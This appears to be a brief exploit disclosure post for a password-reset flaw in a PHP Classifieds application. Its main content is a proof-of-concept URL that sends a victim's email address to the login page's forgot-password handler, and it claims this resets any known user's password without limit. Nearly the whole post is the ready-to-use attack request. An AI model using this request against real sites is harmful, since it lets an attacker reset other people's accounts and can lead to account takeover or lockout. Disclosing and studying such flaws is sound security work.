PHP Classifieds Remote User Reset Password Vulnerability
# Tested on: Linux
SIR <3 [POC] If you know the email of any user can reset your password for an unlimited visiting the following url http://localhost/classifieds/index.php?p=login&email=[mail@victima.com]&forgot=Send+to+me
No comments:
Post a Comment